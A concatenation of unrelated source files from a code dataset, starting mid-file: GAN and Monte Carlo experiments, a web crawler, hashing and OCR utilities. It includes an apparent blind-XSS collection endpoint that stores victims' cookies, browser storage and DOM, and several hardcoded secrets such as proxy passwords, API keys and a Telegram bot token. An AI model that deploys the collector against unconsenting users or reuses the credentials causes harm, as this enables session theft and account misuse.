pd.read_csv(\"{}/{}\".format(wds_data_folder,\"x.dat\"), header=None, nrows=n_points, delim_whitespace=True)\r\nx_original = x_original.values\r\n\r\ny_original = pd.read_csv(\"{}/{}\".format(wds_data_folder,\"y.dat\"), header=None, nrows=n_points, delim_whitespace=True)\r\ny_original = y_original.values\r\n\r\nmars = MARS.MARS(n_variables=n_variables, n_points=n_points, x=x_original, y=y_original,\r\n n_candidate_knots=n_candidate_knots, n_max_basis_functions=n_max_basis_functions,\r\n n_max_interactions=n_max_interactions, difference=difference)\r\nmars.MARS_regress()\r\n# save wind distribution model to 'wds.mars'\r\nmars.save_mars_model_to_file()\r\nwith open(\"{}/{}\".format(wds_data_folder,\"wds.mars\"), \"wb\") as mars_file:\r\n pickle.dump(mars, mars_file)\r\n\r\n\r\n\r\n# results folder\r\n# adaptive_best_layouts_N60_9_20190422213718.dat : best layout for AGA of run index 9\r\n# result_CGA_20190422213715.dat : run time and best eta for CGA method\r\nresults_data_folder = \"data/results\"\r\nif not os.path.exists(results_data_folder):\r\n os.makedirs(results_data_folder)\r\n\r\nn_run_times = 3 # number of run times\r\n# result_arr stores the best conversion efficiency of each run\r\nresult_arr = np.zeros((n_run_times, 2), dtype=np.float32)\r\n\r\n# CGA method\r\nCGA_results_data_folder = \"{}/CGA\".format(results_data_folder)\r\nif not os.path.exists(CGA_results_data_folder):\r\n os.makedirs(CGA_results_data_folder)\r\nfor i in range(0, n_run_times): # run times\r\n print(\"run times {} ...\".format(i))\r\n wfg.load_init_pop(\"{}/init_{}.dat\".format(init_pops_data_folder, i))\r\n run_time, eta = wfg.conventional_genetic_alg(ind_time=i, result_folder=CGA_results_data_folder)\r\n result_arr[i, 0] = run_time\r\n result_arr[i, 1] = eta\r\ntime_stamp = datetime.now().strftime(\"%Y%m%d%H%M%S\")\r\nfilename = 
\"{}/result_CGA_{}.dat\".format(CGA_results_data_folder, time_stamp)\r\nnp.savetxt(filename, result_arr, fmt='%f', delimiter=\" \")\r\n\r\n# AGA method\r\nAGA_results_data_folder = \"{}/AGA\".format(results_data_folder)\r\nif not os.path.exists(AGA_results_data_folder):\r\n os.makedirs(AGA_results_data_folder)\r\nfor i in range(0, n_run_times): # run times\r\n print(\"run times {} ...\".format(i))\r\n wfg.load_init_pop(\"{}/init_{}.dat\".format(init_pops_data_folder, i))\r\n run_time, eta = wfg.adaptive_genetic_alg(ind_time=i, result_folder=AGA_results_data_folder)\r\n result_arr[i, 0] = run_time\r\n result_arr[i, 1] = eta\r\ntime_stamp = datetime.now().strftime(\"%Y%m%d%H%M%S\")\r\nfilename = \"{}/result_AGA_{}.dat\".format(AGA_results_data_folder, time_stamp)\r\nnp.savetxt(filename, result_arr, fmt='%f', delimiter=\" \")\r\n\r\n# SIGA method\r\nSIGA_results_data_folder = \"{}/SIGA\".format(results_data_folder)\r\nif not os.path.exists(SIGA_results_data_folder):\r\n os.makedirs(SIGA_results_data_folder)\r\n# wds_mars_file : wind distribution surface MARS model file\r\nwds_mars_file = \"{}/{}\".format(wds_data_folder, \"wds.mars\")\r\nfor i in range(0, n_run_times): # run times\r\n print(\"run times {} ...\".format(i))\r\n wfg.load_init_pop(\"{}/init_{}.dat\".format(init_pops_data_folder, i))\r\n run_time, eta = wfg.self_informed_genetic_alg(ind_time=i, result_folder=SIGA_results_data_folder,\r\n wds_file=wds_mars_file)\r\n result_arr[i, 0] = run_time\r\n result_arr[i, 1] = eta\r\ntime_stamp = datetime.now().strftime(\"%Y%m%d%H%M%S\")\r\nfilename = \"{}/result_self_informed_{}.dat\".format(SIGA_results_data_folder, time_stamp)\r\nnp.savetxt(filename, result_arr, fmt='%f', delimiter=\" \")\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"552393209","text":"from scripts.heston_mc import calculate_heston_mc_price\nfrom scripts.get_answer_for_prices import make_premialike_answers, read_paramset\nimport os\n\ndef make_price_to_mc_comparison(file_with_prices_and_parameters):\n paramset = read_paramset(file_with_prices_and_parameters)\n if not paramset.keys():\n print(\"cannot obtain parameters from the input file. Are there any? 
name = \" + file_with_prices_and_parameters)\n else:\n mc_prices = []\n source_file = open(file_with_prices_and_parameters, 'r')\n for line in source_file:\n if line[0].isdigit():\n s0 = float(line.split(',')[0])\n heston_mc_price = calculate_heston_mc_price(paramset['T'], s0, paramset['H'], paramset['K'],\n paramset['r_premia'],\n paramset['V0'], paramset['kappa'], paramset['theta'],\n paramset['sigma'], paramset['rho'])\n mc_prices.append(heston_mc_price)\n source_file.close()\n return mc_prices\n\n\ndef create_price_to_mc_comparison_file(file_with_prices_and_parameters):\n source_file_name = file_with_prices_and_parameters\n source_file = open(file_with_prices_and_parameters, 'r')\n # changing filename and directory\n dest_file_name = source_file_name.replace(\".csv\", \"_mc.csv\")\n dest_file_name = source_file_name.replace(dest_file_name.split('/')[-2], \"experiment_premia_vs_mc\")\n dest_file = open(dest_file_name, 'w')\n\n mc_prices = make_price_to_mc_comparison(file_with_prices_and_parameters)\n\n i = 0\n for line in source_file:\n if not line[0].isdigit():\n dest_file.write(line)\n else:\n line_with_mc = line.split(\"\\n\")[0] + \",\" + str(mc_prices[i]) + \"\\n\"\n dest_file.write(line_with_mc)\n i += 1\n\n\ndef make_price_to_mc_comparison_for_folder(experiment_folder):\n for source_file_name in os.listdir(experiment_folder):\n resulting_source_filename = experiment_folder + source_file_name\n if resulting_source_filename.endswith(\".csv\"):\n try:\n create_price_to_mc_comparison_file(resulting_source_filename)\n except:\n print(\"cannot make monte-carlo approximation for\" + resulting_source_filename)\n\nif __name__ == '__main__':\n# make_price_to_mc_comparison_for_folder(\"../output/experiment_premia_prices/\")\n make_price_to_mc_comparison(\"/home/basil/PycharmProjects/Project_Wiener_Hopf_OP/output/experiment/\"\n \"T=1H=90K=100.0r=10V0=0.01kappa=2.0theta=0.01sigma=0.2rho=0.5N=100M=512L=1.5.csv\")\n","sub_path":"LICENSE.md/scripts/method_to_mc_comparison.py","file_name":"method_to_mc_comparison.py","file_ext":"py","file_size_in_byte":2662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"342711629","text":"#!/usr/bin/env python3\n\nfrom src import likely_model_generator\nimport argparse\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Process some integers.')\n parser.add_argument('config_path', type=str, help='configuration file path')\n parser.add_argument('-p', '--preprocess', help='Preprocess the traces', action=\"store_true\")\n parser.add_argument('-u', '--update', help='Update Preprocessed data', action=\"store_true\")\n parser.add_argument('-c', '--create', help='Create Likely Model', action=\"store_true\")\n\n args = parser.parse_args()\n\n likely_model_generator.run(args)\n","sub_path":"LikelyModelGenerator/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"371374252","text":"# coding=utf-8\nimport sys\nimport logging\n\nfrom model.home import HomePageAmericanas, HomePage, HomePageExtra, HomePageNetshoes\nfrom model.product import AmericanasProduct, NetshoesProduct\nfrom helper.crawler import Crawler\n\n\n\ndef getClass(name, module_path=\"model.home\"):\n\n try:\n module = __import__(module_path, fromlist=[name])\n except ImportError:\n raise ValueError(\"Module %s could not be imported\" % (module_path))\n\n try:\n cls_ = getattr(module, name)\n except 
AttributeError:\n        raise ValueError(\"Module %s has no class %s\" % (module_path, name))\n\n    return cls_\n\nclass SitemapReader():\n\n    sitemap = []\n    site = None\n\n    def __init__(self, sitemaps):\n        self.sitemaps = sitemaps\n        self.crawler = Crawler()\n\n    def run(self):\n        full_homepage = {'product' : [], 'homepage': []}\n        total_inserted = 0\n        for sitemap_key in self.sitemaps:\n            total_inserted_aux = 0\n            url = self.sitemaps[sitemap_key]\n            sitemap_content = self.get_sitemap_content(url)\n            content_dict = self.read_sitemap(sitemap_content, sitemap_key)\n            total_inserted_aux = self.save_sitemap_content(content_dict)\n            total_inserted += total_inserted_aux\n        return total_inserted\n\n    def save_sitemap_content(self, content_dict):\n        total_inserted = 0\n\n        for key, content_list in content_dict.iteritems():\n            total_inserted_aux = 0\n            if content_list:\n                content_list = set(content_list)\n                content_list = list(content_list)\n                if key == 'homepage':\n                    total_inserted_aux = len(HomePage.add_homes(content_list))\n                else:\n                    total_inserted_aux = len(NetshoesProduct.objects.insert(content_list))\n                total_inserted += total_inserted_aux\n        logging.debug(\"Foram inseridos %d de %s\", total_inserted, HomePage.__name__)\n        return total_inserted\n\n\n    def read_sitemap(self, localizacoes, sitemap_key):\n        homepage_list = []\n        product_list = []\n        content_sitemap = {'product': product_list, 'homepage': homepage_list}\n        for local in localizacoes:\n            url = local.firstChild.nodeValue\n            if \"xml\" in url:\n                content_sitemap_aux = self.read_sitemap(self.get_sitemap_content(url), sitemap_key)\n                content_sitemap['product'] = content_sitemap['product'] + content_sitemap_aux['product']\n                content_sitemap['homepage'] = content_sitemap['homepage'] + content_sitemap_aux['homepage']\n            elif \"/produto/\" in url:\n                # only Netshoes has product pages inside the sitemap\n                product = NetshoesProduct(url=url, site=sitemap_key)\n                complete_product = product.parse()\n                product_list.append(complete_product)\n            else:\n                home_page_class = getClass(name=\"HomePage\"+sitemap_key)\n                homepage = home_page_class(url=url, priority=10, site=sitemap_key)\n                homepage_list.append(homepage)\n        return content_sitemap\n\n    def get_sitemap_content(self, url):\n        xmldoc = self.crawler.crawl_XML(url)\n        urls = self.crawler.get_XML_info(xmldoc, 'loc')\n        return urls\n\n\nclass HomePageReader(object):\n\n    def read_content(self, homepage_class_name):\n        product_list = []\n        i = 0\n        total_inserido = 0\n        total_lido = 0\n        for home in homepage_class_name.objects(priority__lte=5):\n            product_list.extend(home.parse())\n            i+=1\n            # since this is a small machine we insert in small batches\n            if len(product_list) > 5000:\n                total_lido += len(product_list)\n                new_products_set = set(product_list)\n                new_products_list = list(new_products_set)\n                total_inserido += homepage_class_name.add_products(new_products_list)\n                logging.debug(\"Insercao parcial de produtos, porque a maquina só tem 1GB\")\n                product_list = []\n\n            logging.debug(\"Total parcial: %d homes lidas e %d produtos\", i, (total_lido + len(product_list)))\n\n        new_products_set = set(product_list)\n        new_products_list = list(new_products_set)\n        total_inserido += homepage_class_name.add_products(new_products_list)\n\n        logging.debug(\"Foram lidos %d e inseridos %d\", total_lido, total_inserido)\n        return\n\nclass ProductReader(object):\n\n    def update_products(self, product_type):\n        product = product_type()\n        product.update_products()\n\ndef setup_log(arguments):\n\n    try: # Python 2.7+\n        from logging import NullHandler\n    except ImportError:\n        class 
NullHandler(logging.Handler):\n def emit(self, record):\n pass\n\n logging.getLogger(__name__).addHandler(NullHandler())\n logging.basicConfig(filename=arguments[1]+\"-\"+arguments[2]+\".log\",level=logging.DEBUG)\n\n\nif __name__ == '__main__':\n\n setup_log(sys.argv)\n\n sites = {\"Americanas\":\"http://www.americanas.com.br/sitemap_index_acom.xml\",\n \"Extra\":\"http://buscando.extra.com.br/sitemap.xml\",\n \"Netshoes\": \"http://www.netshoes.com.br/sitemap.xml\",\n \"Submarino\": \"http://www.submarino.com.br/sitemap_index_suba.xml\" }\n if sys.argv and sys.argv[1] == 'sitemap-read':\n #gera as homepages a partir dos sitemaps\n sitemap = sites[sys.argv[2]]\n logging.debug(\"Opcao de leitura do sitemap, iniciando geracao das homes de produto do site %s\", sitemap)\n x = SitemapReader({sys.argv[2]: sitemap})\n total_inserted = x.run()\n logging.debug(\"Foram lidas %d paginas, que podem ser homes e pagina de produtos\", total_inserted)\n\n elif sys.argv and sys.argv[1] == 'product-read':\n logging.debug(\"Inicia o processo de leitura das homes %s para gerar as paginas e produto\", sys.argv[2])\n\n cls_ = getClass(name=\"HomePage\"+sys.argv[2])\n home_page_reader = HomePageReader()\n home_page_reader.read_content(cls_)\n\n elif sys.argv and sys.argv[1] == 'product-update':\n logging.debug(\"Inicia o processo de leitura de updade dos produtos %s\", sys.argv[2])\n\n cls_ = getClass(name=sys.argv[2]+\"Product\", module_path=\"model.product\")\n product_reader = ProductReader()\n product_reader.update_products(cls_)\n","sub_path":"scrapper/sitemap.py","file_name":"sitemap.py","file_ext":"py","file_size_in_byte":6415,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"508375947","text":"import sys\nimport os\nimport binascii\nfrom typing import Optional\n\nfrom Crypto.Hash import SHA256\n\n\ndef sha256sum_file(filename: str, chunk_sz=512) -> Optional[bytes]:\n # Checks + open file\n if not os.path.exists(filename):\n return None\n # sha256 ctx init\n sha256_ctx = SHA256.new()\n # read file + update sha256 ctx\n with open(filename, 'rb') as f_in:\n data = f_in.read(chunk_sz)\n while len(data) > 0:\n sha256_ctx.update(data)\n data = f_in.read(chunk_sz)\n return sha256_ctx.digest()\n\n \n\nif __name__ == '__main__':\n if len(sys.argv) != 2:\n print(f'usage: {sys.argv[0]} ')\n sys.exit(1)\n # else:\n digest = sha256sum_file(sys.argv[1])\n if digest is not None:\n print(f'{binascii.hexlify(digest).decode()}')\n else:\n print(f'error')\n sys.exit(0)\n","sub_path":"misc/sha256sum.py","file_name":"sha256sum.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"184944057","text":"#!/usr/bin/python3\n\n# Imports\nimport base64\nimport json\nimport requests\nimport os\n# ワイルドカードを利用\nfrom glob import glob\n\nTEGAKI_FORM_ENDPOINT = 'https://api.tegaki.ai/hwr/v1/form'\nMY_API_KEY = '3bfeec98-8832-4f05-8477-7f8309f7b914'\nPROXIES = {\n 'http': 'http://Takeshi_Umezaki:umezaki6@192.168.236.23:8080',\n 'https': 'https://Takeshi_Umezaki:umezaki6@192.168.236.23:8080',\n }\nFORM_JSON_FILE_NAME = \"karisinsa.json\"\nIMAGE_DIR = \"C:\\\\Users\\\\Takeshi_Umezaki\\\\Documents\\\\ocr\\\\demo\\\\forapi\\\\\"\n# wild card\n# FILES = \"MpfRcvImgTFS00000244_0001*.jpg\"\nFILES = \"*.jpg\"\n\n_json_str = \"\"\n_request_id = \"\"\n_file_name = \"\"\n\n \n# base64-encoding files\n\n\ndef encode_image(image):\n image_content = image.read()\n encoded_byte = 
base64.b64encode(image_content)\n encoded_str = encoded_byte.decode(\"UTF-8\")\n return encoded_str\n\n# Post request for a single form to Tegaki service\n\n\ndef post_form(template_json_file, form_image_file):\n # Read json file\n template_json_data = json.loads(template_json_file)\n\n # Inject the base64-encoded form image into the template json\n template_json_data['imageData'] = encode_image(form_image_file)\n\n # Send POST request to Tegaki service\n response = requests.post(TEGAKI_FORM_ENDPOINT,\n headers={'Authorization': 'apikey ' + MY_API_KEY},\n json=template_json_data, proxies=PROXIES)\n\n # Print the result\n print(response.status_code)\n print(response.json())\n dict_res_json = response.json()\n _request_id = dict_res_json['requestId']\n print(_file_name, _request_id)\n\n file_results = open(\"results.txt\", \"a\", encoding=\"shift_jis\")\n file_results.write(_file_name + \",\" + _request_id + \"\\n\")\n file_results.close()\n\n\nif __name__ == '__main__':\n print(\"start\")\n os.chdir(IMAGE_DIR)\n\n with open(FORM_JSON_FILE_NAME, 'r', encoding=\"utf-8\") as json_file:\n _json_str = str(json_file.read())\n\n print(len(_json_str))\n files = glob(FILES)\n for file_name in files:\n _file_name = file_name\n print(_file_name)\n image_file = open(_file_name, \"rb\")\n\n post_form(_json_str, image_file)\n\n","sub_path":"tegaki_req.py","file_name":"tegaki_req.py","file_ext":"py","file_size_in_byte":2181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"171164562","text":"import urllib.parse\nimport json\nimport urllib.request\nimport urllib\n\n\nBASE_URL='http://open.mapquestapi.com/directions/v2/route?'\nMAP_KEY='Fmjtd%7Cluu821682u%2Caw%3Do5-942n0a'\n#MAP_KEY='Fmjtd%7Cluu82q01nl%2Cbl%3Do5-94ya1f'\nELE_URL='http://open.mapquestapi.com/elevation/v1/profile?'\n\n\ndef build_multiple_url(addresses:list,location_start:str)->str:\n '''\n Build the URL necessary to generate the json which will be used\n later to retrieve commands.\n\n This function is written in a way where x>2 number of locations can be handled \n '''\n query_parameters=[('key',MAP_KEY),('ambiguities','ignore'),('from',location_start)]\n for x in addresses:\n query_parameters.append(('to',x))\n return BASE_URL+urllib.parse.urlencode(query_parameters)\n\n\ndef build_elevation(elevations:list)->str:\n query_parameters=[('key',MAP_KEY),('unit','f'),('latLngCollection',','.join(str(lng) for lng in elevations))]\n return ELE_URL+urllib.parse.urlencode(query_parameters)\n \n\ndef get_json_result(url:str)->'json':\n '''\n Opens the url returned from the method above and reads the contents\n and returns the json which will be used to process the commands provided\n '''\n response = None\n #url=urllib.parse.unquote(url)\n try:\n response=urllib.request.urlopen(url)\n return json.loads(response.read().decode(encoding='utf-8'))\n finally:\n if response != None:\n response.close()\n\n\n\n\n \n\n\n \n","sub_path":"Lab 3/QueryBuilding.py","file_name":"QueryBuilding.py","file_ext":"py","file_size_in_byte":1458,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"402480003","text":"import json\nimport time\n\nfrom app import db\nfrom app.api import bp\nfrom app.models import XSS, Client, Settings\nfrom app.utils import send_mail, send_webhook\nfrom flask import jsonify, request\nfrom flask_cors import cross_origin\n\n\n@bp.route(\"/x//\", methods=[\"GET\", \"POST\"])\n@cross_origin()\ndef catch_xss(flavor, uid):\n \"\"\"Catches an 
XSS\"\"\"\n client = Client.query.filter_by(uid=uid).first()\n parameters = None\n\n if client == None:\n return jsonify({\"status\": \"OK\"}), 200\n\n if flavor == \"r\":\n xss_type = \"reflected\"\n else:\n xss_type = \"stored\"\n if \"X-Forwarded-For\" in request.headers:\n ip_addr = request.headers[\"X-Forwarded-For\"].split(\", \")[0]\n else:\n ip_addr = request.remote_addr\n\n if request.method == \"GET\":\n parameters = request.args.to_dict()\n elif request.method == \"POST\":\n if request.is_json:\n parameters = request.get_json()\n else:\n parameters = request.form\n\n headers = {}\n tags = []\n for header in request.headers:\n headers.update({header[0]: header[1]})\n\n data = {}\n\n for param, value in parameters.items():\n\n if param == \"cookies\":\n if value != \"\":\n if \"cookies\" not in data.keys():\n data[\"cookies\"] = {}\n cookies_list = value.split(\"; \")\n for cookie in cookies_list:\n cookie_array = cookie.split(\"=\")\n cookie_name = cookie_array[0]\n cookie_value = \"\".join(cookie_array[1:])\n data[\"cookies\"].update({cookie_name: cookie_value})\n\n elif param == \"local_storage\":\n if value != \"\" and value != \"{}\":\n if \"local_storage\" not in data.keys():\n data[\"local_storage\"] = {}\n local_storage = json.loads(value)\n for element_name, element_value in local_storage.items():\n data[\"local_storage\"].update({element_name: element_value})\n\n elif param == \"session_storage\":\n if value != \"\" and value != \"{}\":\n if \"session_storage\" not in data.keys():\n data[\"session_storage\"] = {}\n session_storage = json.loads(value)\n for element_name, element_value in session_storage.items():\n data[\"session_storage\"].update({element_name: element_value})\n else:\n if value != \"\" and value != \"{}\":\n if param == \"dom\":\n data[\"dom\"] = \"\\n{}\\n\".format(value)\n elif param == \"tags\":\n tags = value.split(\",\")\n else:\n data[param] = value\n\n xss = XSS(\n headers=json.dumps(headers),\n ip_addr=ip_addr,\n client_id=client.id,\n xss_type=xss_type,\n data=json.dumps(data),\n timestamp=int(time.time()),\n tags=json.dumps(tags),\n )\n db.session.add(xss)\n db.session.commit()\n\n settings = Settings.query.first()\n\n if (xss.client.mail_to != None or settings.mail_to != None) and settings.smtp_host != None:\n try:\n send_mail(xss=xss)\n settings.smtp_status = True\n db.session.commit()\n except:\n settings.smtp_status = False\n db.session.commit()\n\n if settings.webhook_url != None or xss.client.webhook_url != None:\n try:\n send_webhook(xss=xss)\n except:\n pass\n\n return jsonify({\"status\": \"OK\"}), 200\n","sub_path":"server/app/api/x.py","file_name":"x.py","file_ext":"py","file_size_in_byte":3570,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"604713732","text":"import sys\nsys.path.append(\"src/\") \n\n\nimport os\nimport random\nimport numpy as np\nimport sklearn.datasets\nimport tensorflow as tf\nimport csv \nimport tensorflow_utils as tf_utils\nimport utils as utils\n\nimport pandas as pd\nfrom scipy import stats\n\nfrom typing import List\n\nfrom dataset_manager import DataSetManager\n\nfrom telegrad.dl_bot import DLBot\nfrom clr import CyclicLR\n\nfrom error_metrics import gan_error_all_species\n\n\ntelegram_token = \"753043252:AAG2wjtBKV9nlcv9VEjLDyoShzkTEjTKFzA\" # replace TOKEN with your bot's token\n\n# user id is optional, however highly recommended as it limits the access to you alone.\ntelegram_user_id = 780738092 # replace None with your telegram user id 
(integer):\n\n\"\"\"\n----------------8<-------------[ cut here ]------------------\n\n------------------------------------------------\n\"\"\"\ndef train_gan(train_set, indices: List, samples_per_N:int, repetition_n:int, identifier:str,experiment_name:str, batch_size: int =256, desired_epochs: int = 1000):\n \"\"\"\n The GAN is trained for 1000 epochs. If a a set of 60k samples is trained with a batchsize of 256,\n then a epoch equals 226 iterations. A budget of 100,000 iterations would equals to 426\n\n \"\"\"\n assert train_set.shape[0] > len(indices)\n\n print(train_set.shape)\n print(len(indices))\n\n my_ds = DataSetManager(train_set[indices])\n\n\n # print(\"Set number of iterations to train\\n\")\n v5 = (desired_epochs*(train_set[indices].shape[0]))//batch_size +1\n\n print(\"ITERS \"+str(v5))\n print(\"SIZE \"+str(train_set[indices].shape))\n\n\n # print(\"Use pretrained model? (0 means No, some number different to 0 means yes)\\n\")\n decision_number = 0 #int( input() )\n\n # print(\"Type a name to save the model with?\\n\")\n model_tag = str(round(samples_per_N)) +'_'+ str(repetition_n)\n \n\n storing_path = 'data/'+ experiment_name + \"/\" + model_tag + '_data/'\n model_path = storing_path+ model_tag + '.ckpt'\n \n # Recall that os.mkdir isn't recursive, so it only makes on directoryt at a time\n try:\n # Create target Directory\n os.mkdir(storing_path)\n print(\"Directory \" , storing_path , \" Created \") \n except FileExistsError:\n print(\"Directory \" , storing_path , \" already exists\")\n\n # ===> Auxiliar functions <=== \n \"\"\"\n ----------------8<-------------[ cut here ]------------------\n\n ------------------------------------------------\n \"\"\"\n def save_history(files_prefix, gen_loss_record,disc_loss_record, jsd_error, current_epoch, epoch_record,my_ds,iter_, epochs, global_iters ):\n # Save losses per epoch\n\n df = pd.DataFrame(np.array(gen_loss_record))\n with open(files_prefix+'_gen_loss.csv', 'w+') as f:\n df.to_csv(f, header=False, index=False)\n\n df = pd.DataFrame(np.array(disc_loss_record))\n with open(files_prefix+'_disc_loss.csv', 'w+') as f:\n df.to_csv(f, header=False, index=False)\n\n df = pd.DataFrame(np.array(epoch_record))\n with open(files_prefix+'_epoch_record.csv', 'w+') as f:\n df.to_csv(f, header=False, index=False)\n # Save current iter and epochs\n\n df = pd.DataFrame(np.array( [epochs + my_ds.epochs_completed, global_iters + iter_] ) ) \n\n with open(files_prefix+'_training.csv', 'w+') as f:\n df.to_csv(f, header=False, index=False)\n\n with open(files_prefix+'_jsd_error.csv', 'a') as csvFile:\n writer = csv.writer(csvFile)\n writer.writerow([current_epoch, jsd_error]) \n\n def send_bot_message(bot,my_ds, iter_, ITERS, identifier ):\n \"\"\" \n Not quite straighforward since the critic draws many more samples.\n\n \"\"\"\n\n message = \"\\nEpochs [\"+str(my_ds.epochs_completed)+\"] Iter: \"+str(iter_)+\";\\t\"+str(np.round(100* iter_/ITERS,2))+\"% \"\n message = message + identifier\n print(message)\n bot.set_status(message)\n # Send update message\n if bot.verbose:\n bot.send_message(message) \n\n print(\"\\n\")\n\n def save_gen_samples(gen_op, disc_op, sess,path, k, n = 4):\n \"\"\"\n k: is the number of epochs used to trained the generator\n n: is the number of batches to draw samples\n \"\"\"\n\n suffix = '_gen_samples_'+str(k)+'_epochs_'+'.csv'\n\n for k in range(n):\n\n samples = sess.run(gen_op)\n df = pd.DataFrame(np.array(samples))\n with open(path+suffix, 'a') as f:\n df.to_csv(f, header=False, index=False)\n\n # Score the 
samples using the critic\n scores = sess.run(disc_op)\n df = pd.DataFrame(np.array(scores))\n with open(path+'scores_'+suffix, 'a') as f:\n df.to_csv(f, header=False, index=False)\n\n # ===> Model Parameters <=== \n \"\"\"\n ----------------8<-------------[ cut here ]------------------\n\n ------------------------------------------------\n \"\"\"\n\n DIM = 512 # model dimensionality\n GEN_DIM = 100 # output dimension of the generator\n DIS_DIM = 1 # outptu dimension fo the discriminator\n FIXED_GENERATOR = False # wheter to hold the generator fixed at ral data plus Gaussian noise, as in the plots in the paper\n LAMBDA = .1 # smaller lambda makes things faster for toy tasks, but isn't necessary if you increase CRITIC_ITERS enough\n BATCH_SIZE = batch_size # batch size\n ITERS = v5 #100000 # how many generator iterations to train for\n FREQ = 250 # sample frequency\n \n \n CRITIC_ITERS = 5 # homw many critic iteractions per generator iteration\n\n\n def Generator_Softmax(n_samples, name='gen'):\n\n with tf.variable_scope(name):\n noise = tf.random_normal([n_samples, GEN_DIM])\n output01 = tf_utils.linear(noise, 3*DIM, name='fc-1')\n output01 = tf_utils.relu(output01, name='relu-1')\n \n output02 = tf_utils.linear(output01, 3*DIM, name='fc-2')\n output02 = tf_utils.relu(output02, name='relu-2')\n \n output03 = tf_utils.linear(output02, 3*DIM, name='fc-3')\n output03 = tf_utils.relu(output03, name='relu-3')\n\n output04 = tf_utils.linear(output03, GEN_DIM, name='fc-4')\n\n # Reminder: a logit can be modeled as a linear function of the predictors\n output05 = tf.nn.softmax(output04, name = 'softmax-1')\n\n return output05\n \n\n def Discriminator(inputs, is_reuse=True, name='disc'):\n with tf.variable_scope(name, reuse=is_reuse):\n print('is_reuse: {}'.format(is_reuse))\n output01 = tf_utils.linear(inputs, 3*DIM, name='fc-1')\n output01 = tf_utils.relu(output01, name='relu-1')\n\n output02 = tf_utils.linear(output01, 3*DIM, name='fc-2')\n output02 = tf_utils.relu(output02, name='relu-2')\n\n output03 = tf_utils.linear(output02, 3*DIM, name='fc-3')\n output03 = tf_utils.relu(output03, name='relu-3')\n\n output04 = tf_utils.linear(output03, DIS_DIM, name='fc-4')\n \n return output04\n \n real_data = tf.placeholder(tf.float32, shape=[None, GEN_DIM])\n fake_data = Generator_Softmax(BATCH_SIZE)\n\n disc_real = Discriminator(real_data, is_reuse=False)\n disc_fake = Discriminator(fake_data)\n\n disc_cost = tf.reduce_mean(disc_fake) - tf.reduce_mean(disc_real)\n gen_cost = - tf.reduce_mean(disc_fake)\n\n # WGAN gradient penalty parameters\n\n alpha = tf.random_uniform(shape=[BATCH_SIZE, 1], minval=0., maxval=1.)\n interpolates = alpha*real_data + (1.-alpha) * fake_data\n disc_interpolates = Discriminator(interpolates)\n gradients = tf.gradients(disc_interpolates, [interpolates][0])\n slopes = tf.sqrt(tf.reduce_sum(tf.square(gradients), reduction_indices=[1]))\n gradient_penalty = tf.reduce_mean((slopes - 1)**2)\n\n disc_cost += LAMBDA * gradient_penalty\n \n disc_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='disc')\n gen_vars = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES, scope='gen')\n\n\n\n disc_lr = tf.placeholder(tf.float32, shape=()) # 1e-4\n gen_lr = tf.placeholder(tf.float32, shape=()) # 1e-4\n\n disc_train_op = tf.train.AdamOptimizer(learning_rate=disc_lr, beta1=0.5, beta2=0.9).minimize(disc_cost, var_list=disc_vars)\n\n if len(gen_vars) > 0:\n gen_train_op = tf.train.AdamOptimizer(learning_rate=gen_lr, beta1=0.5, beta2=0.9).minimize(gen_cost, var_list=gen_vars)\n 
else:\n gen_train_op = tf.no_op()\n\n\n \"\"\"\n ----------------8<-------------[ cut here ]------------------\n\n ------------------------------------------------\n \"\"\"\n # ===> Model Parameters <=== \n\n df = pd.DataFrame(np.array(indices))\n with open(storing_path+'training_indices.csv', 'a') as f:\n df.to_csv(f, header=False, index=False)\n\n \n session_saver = tf.train.Saver()\n\n # files_prefix = 'model/'+ model_tag \n\n if decision_number == 0:\n pre_trained = False\n\n gen_loss_record = [] # type: List[float]\n disc_loss_record = [] # type: List[float]\n epoch_record = [] # type: List[float]\n\n epochs = 0\n global_iters = 0\n\n else:\n pre_trained = True\n temp = pd.read_csv(storing_path+'_training.csv',header=None ).values\n \n epochs, global_iters = temp.flatten()\n\n my_ds.epochs_completed = epochs\n\n gen_loss_record = (pd.read_csv(storing_path+'_gen_loss.csv',header=None ).values).tolist()\n disc_loss_record = (pd.read_csv(storing_path+'_disc_loss.csv',header=None ).values).tolist()\n epoch_record = (pd.read_csv(storing_path+'_epoch_record.csv',header=None ).values).tolist()\n\n # Create a DLBot instance\n bot = DLBot(token=telegram_token, user_id=telegram_user_id)\n # Activate the bot\n bot.activate_bot()\n\n print(\"\\nTelegram bot has been activated \")\n\n\n iters_per_epoch = my_ds.num_examples/BATCH_SIZE\n\n total_iters = int(np.ceil((desired_epochs*iters_per_epoch)/CRITIC_ITERS))\n\n critic_iters = np.round((5/6)*total_iters)\n gen_iters = np.round((1/6)*total_iters)\n\n \n ITERS = total_iters\n\n # Train loop\n with tf.Session() as sess:\n \n if pre_trained == False: # false by default:\n sess.run(tf.global_variables_initializer())\n if pre_trained == True:\n # tf.reset_default_graph() \n session_saver.restore(sess,model_path)\n #\n # DUCK TAPE SOLUTION\n iter_ = 0\n\n \"\"\"\n while my_ds.epochs_completed < desired_epochs:\n iter_ +=1\n \"\"\"\n gen_lr_ = CyclicLR(base_lr=10**-4.72, max_lr=10**-3.72, step_size=gen_iters)\n disc_lr_ = CyclicLR(base_lr=10**-4.72, max_lr=10**-3.72, step_size=critic_iters)\n\n for iter_ in range(ITERS):\n batch_data, disc_cost_ = None, 